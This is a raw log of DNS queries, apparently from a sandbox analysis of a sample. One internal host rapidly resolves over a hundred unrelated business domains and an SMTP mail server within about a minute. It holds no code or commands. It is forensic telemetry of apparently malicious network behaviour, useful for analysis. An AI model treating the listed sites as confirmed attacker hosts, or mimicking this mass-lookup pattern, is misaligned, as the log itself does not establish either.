                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.904191017 CEST192.168.2.38.8.8.80x14fdStandard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.908704042 CEST192.168.2.38.8.8.80xc385Standard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.919373035 CEST192.168.2.38.8.8.80x158aStandard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.993288040 CEST192.168.2.38.8.8.80xbea5Standard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.245260954 CEST192.168.2.38.8.8.80xaeb7Standard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.630690098 CEST192.168.2.38.8.8.80x693aStandard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.633857012 CEST192.168.2.38.8.8.80x23ceStandard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.726238012 CEST192.168.2.38.8.8.80xb82fStandard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:19.958029032 CEST192.168.2.38.8.8.80x9248Standard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:20.205467939 CEST192.168.2.38.8.8.80x8e0bStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:20.676697016 CEST192.168.2.38.8.8.80x51cbStandard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:21.689502001 CEST192.168.2.38.8.8.80xed0aStandard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:21.998184919 CEST192.168.2.38.8.8.80x7accStandard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:22.002145052 CEST192.168.2.38.8.8.80xf9b9Standard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:22.021007061 CEST192.168.2.38.8.8.80x2a6cStandard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:22.026413918 CEST192.168.2.38.8.8.80x9e2eStandard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:22.804476976 CEST192.168.2.38.8.8.80x1599Standard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.040473938 CEST192.168.2.38.8.8.80x368dStandard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.044609070 CEST192.168.2.38.8.8.80x37b0Standard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.093338013 CEST192.168.2.38.8.8.80x124Standard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.099287987 CEST192.168.2.38.8.8.80x47faStandard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.212549925 CEST192.168.2.38.8.8.80x834eStandard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.487113953 CEST192.168.2.38.8.8.80xb2bfStandard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.525969028 CEST192.168.2.38.8.8.80x1979Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.529388905 CEST192.168.2.38.8.8.80x3144Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:23.644100904 CEST192.168.2.38.8.8.80x6acStandard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:24.071486950 CEST192.168.2.38.8.8.80x76d9Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:24.080178022 CEST192.168.2.38.8.8.80xd2cStandard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:24.911084890 CEST192.168.2.38.8.8.80xc9caStandard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:24.913961887 CEST192.168.2.38.8.8.80x7c08Standard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:25.216080904 CEST192.168.2.38.8.8.80x5ddStandard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:26.453121901 CEST192.168.2.38.8.8.80x1875Standard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.012495995 CEST192.168.2.38.8.8.80x2f62Standard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.014307976 CEST192.168.2.38.8.8.80x9c0Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.016376972 CEST192.168.2.38.8.8.80x4101Standard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.018570900 CEST192.168.2.38.8.8.80xa4c4Standard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.020720005 CEST192.168.2.38.8.8.80x5792Standard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.022725105 CEST192.168.2.38.8.8.80x9c56Standard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.024434090 CEST192.168.2.38.8.8.80xc9e3Standard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.025718927 CEST192.168.2.38.8.8.80xd921Standard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.026808977 CEST192.168.2.38.8.8.80x95aStandard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.027477026 CEST192.168.2.38.8.8.80x6d59Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.183666945 CEST192.168.2.38.8.8.80x8636Standard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.326060057 CEST192.168.2.38.8.8.80x4b81Standard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.327517986 CEST192.168.2.38.8.8.80xc315Standard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.328088999 CEST192.168.2.38.8.8.80x9d2Standard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.346811056 CEST192.168.2.38.8.8.80xa8f6Standard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.624499083 CEST192.168.2.38.8.8.80x6c8bStandard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.631594896 CEST192.168.2.38.8.8.80xd0b0Standard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.632368088 CEST192.168.2.38.8.8.80x4b0cStandard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.636605024 CEST192.168.2.38.8.8.80x10baStandard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.857166052 CEST192.168.2.38.8.8.80x2fc9Standard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.858494997 CEST192.168.2.38.8.8.80x56c7Standard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:27.995141983 CEST192.168.2.38.8.8.80x9c8dStandard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.239819050 CEST192.168.2.38.8.8.80x442dStandard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.240928888 CEST192.168.2.38.8.8.80xd7aaStandard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.241436958 CEST192.168.2.38.8.8.80x836bStandard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.242353916 CEST192.168.2.38.8.8.80x15fbStandard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.264548063 CEST192.168.2.38.8.8.80x1ea7Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.936352015 CEST192.168.2.38.8.8.80xd9e6Standard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.937437057 CEST192.168.2.38.8.8.80x5871Standard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.937437057 CEST192.168.2.38.8.8.80xdeadStandard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.939894915 CEST192.168.2.38.8.8.80xedeStandard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.941800117 CEST192.168.2.38.8.8.80x551bStandard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:28.943494081 CEST192.168.2.38.8.8.80x11f9Standard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.548315048 CEST192.168.2.38.8.8.80xc598Standard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.548315048 CEST192.168.2.38.8.8.80x2a7dStandard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.549268007 CEST192.168.2.38.8.8.80x89fcStandard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.573344946 CEST192.168.2.38.8.8.80x3d7dStandard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.672205925 CEST192.168.2.38.8.8.80x251Standard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.672205925 CEST192.168.2.38.8.8.80x4fbbStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.673907042 CEST192.168.2.38.8.8.80x4c94Standard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:29.855499983 CEST192.168.2.38.8.8.80x9792Standard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.146276951 CEST192.168.2.38.8.8.80x5bc3Standard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.198314905 CEST192.168.2.38.8.8.80x5191Standard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.210545063 CEST192.168.2.38.8.8.80xf609Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.213753939 CEST192.168.2.38.8.8.80x2afeStandard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.626832962 CEST192.168.2.38.8.8.80xad3dStandard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.628901958 CEST192.168.2.38.8.8.80xbfa1Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.632200956 CEST192.168.2.38.8.8.80xcdbcStandard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.635576010 CEST192.168.2.38.8.8.80x64e9Standard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.920386076 CEST192.168.2.38.8.8.80xd91eStandard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.925317049 CEST192.168.2.38.8.8.80xd2bdStandard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:30.925981045 CEST192.168.2.38.8.8.80x22ccStandard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:31.386889935 CEST192.168.2.38.8.8.80xe5aaStandard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:31.389215946 CEST192.168.2.38.8.8.80xc70fStandard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:31.389694929 CEST192.168.2.38.8.8.80x4f95Standard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:31.397166967 CEST192.168.2.38.8.8.80x81b4Standard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:31.403044939 CEST192.168.2.38.8.8.80x199Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:31.491714001 CEST192.168.2.38.8.8.80xa2afStandard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:31.822033882 CEST192.168.2.38.8.8.80xf8f2Standard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.143333912 CEST192.168.2.38.8.8.80x765cStandard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.148139000 CEST192.168.2.38.8.8.80x5764Standard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.152865887 CEST192.168.2.38.8.8.80xabadStandard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.297791004 CEST192.168.2.38.8.8.80x22e9Standard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.392293930 CEST192.168.2.38.8.8.80x4265Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.698306084 CEST192.168.2.38.8.8.80xc9e3Standard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.719206095 CEST192.168.2.38.8.8.80x71c4Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:32.728791952 CEST192.168.2.38.8.8.80x78edStandard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:33.158080101 CEST192.168.2.38.8.8.80x2fb7Standard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:33.791172028 CEST192.168.2.38.8.8.80x98b8Standard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:35.045589924 CEST192.168.2.38.8.8.80x96dfStandard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:35.355151892 CEST192.168.2.38.8.8.80x5081Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:35.757646084 CEST192.168.2.38.8.8.80xf4c5Standard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:35.992324114 CEST192.168.2.38.8.8.80x6f43Standard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:36.982552052 CEST192.168.2.38.8.8.80x3f2fStandard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:38.171852112 CEST192.168.2.38.8.8.80x95b6Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:38.918559074 CEST192.168.2.38.8.8.80x54b2Standard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:40.228307009 CEST192.168.2.38.8.8.80x685Standard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:40.240432978 CEST192.168.2.38.8.8.80xd1abStandard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:41.752713919 CEST192.168.2.38.8.8.80xe88fStandard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:41.758013964 CEST192.168.2.38.8.8.80x5f7aStandard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:42.023483038 CEST192.168.2.38.8.8.80xc6efStandard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:42.480413914 CEST192.168.2.38.8.8.80x1358Standard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:42.953727961 CEST192.168.2.38.8.8.80xcStandard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:44.194602966 CEST192.168.2.38.8.8.80x637aStandard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:44.644560099 CEST192.168.2.38.8.8.80x9848Standard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:44.747481108 CEST192.168.2.38.8.8.80xc97Standard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.253500938 CEST192.168.2.38.8.8.80xbd26Standard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:45.851031065 CEST192.168.2.38.8.8.80xc35cStandard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.070903063 CEST192.168.2.38.8.8.80x46dbStandard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.292633057 CEST192.168.2.38.8.8.80xe7a4Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.450544119 CEST192.168.2.38.8.8.80xed4fStandard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:46.915916920 CEST192.168.2.38.8.8.80x8b45Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:47.733381033 CEST192.168.2.38.8.8.80x7322Standard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.186712027 CEST192.168.2.38.8.8.80x48e5Standard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.388163090 CEST192.168.2.38.8.8.80x6a96Standard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:48.604548931 CEST192.168.2.38.8.8.80xc841Standard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.113831043 CEST192.168.2.38.8.8.80x349bStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.215008974 CEST192.168.2.38.8.8.80x50e1Standard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.388123989 CEST192.168.2.38.8.8.80xdfb5Standard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:49.530364037 CEST192.168.2.38.8.8.80x89baStandard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.109936953 CEST192.168.2.38.8.8.80xf1fbStandard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.252321959 CEST192.168.2.38.8.8.80x3b12Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.256403923 CEST192.168.2.38.8.8.80xeb9aStandard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.257339001 CEST192.168.2.38.8.8.80x7b67Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.772248983 CEST192.168.2.38.8.8.80x17c0Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.790460110 CEST192.168.2.38.8.8.80xe0d6Standard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:50.947546959 CEST192.168.2.38.8.8.80x4a57Standard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.688303947 CEST192.168.2.38.8.8.80xceb8Standard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.827905893 CEST192.168.2.38.8.8.80x27a8Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:51.974879980 CEST192.168.2.38.8.8.80xfb70Standard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.376405954 CEST192.168.2.38.8.8.80x7b46Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.407764912 CEST192.168.2.38.8.8.80x8087Standard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:52.711790085 CEST192.168.2.38.8.8.80x68feStandard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:53.149555922 CEST192.168.2.38.8.8.80x2e8bStandard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:53.454067945 CEST192.168.2.38.8.8.80x32d8Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:53.469254971 CEST192.168.2.38.8.8.80xe664Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:53.669038057 CEST192.168.2.38.8.8.80xc946Standard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:54.228635073 CEST192.168.2.38.8.8.80xbd28Standard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:54.313420057 CEST192.168.2.38.8.8.80x1f64Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:54.970500946 CEST192.168.2.38.8.8.80xf79bStandard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:54.970500946 CEST192.168.2.38.8.8.80xc2Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:55.832520008 CEST192.168.2.38.8.8.80x4e85Standard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:56.008150101 CEST192.168.2.38.8.8.80xc2Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:56.297317982 CEST192.168.2.38.8.8.80xee26Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:57.827933073 CEST192.168.2.38.8.8.80x50fbStandard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:59.195434093 CEST192.168.2.38.8.8.80xa395Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:59.392257929 CEST192.168.2.38.8.8.80xca24Standard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:01.004302979 CEST192.168.2.38.8.8.80x2f8fStandard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.141287088 CEST192.168.2.38.8.8.80xf735Standard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:02.451348066 CEST192.168.2.38.8.8.80xde79Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.016678095 CEST192.168.2.38.8.8.80xa387Standard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.176868916 CEST192.168.2.38.8.8.80x9497Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.486076117 CEST192.168.2.38.8.8.80x99dStandard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:03.705878973 CEST192.168.2.38.8.8.80x838cStandard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:04.087718964 CEST192.168.2.38.8.8.80x5330Standard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:06.520827055 CEST192.168.2.38.8.8.80x7e7fStandard query (0)smtp.mail.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:06.867341042 CEST192.168.2.38.8.8.80x7186Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:07.003691912 CEST192.168.2.38.8.8.80x4fa3Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:07.009238958 CEST192.168.2.38.8.8.80x298aStandard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:08.663762093 CEST192.168.2.38.8.8.80xbb4cStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
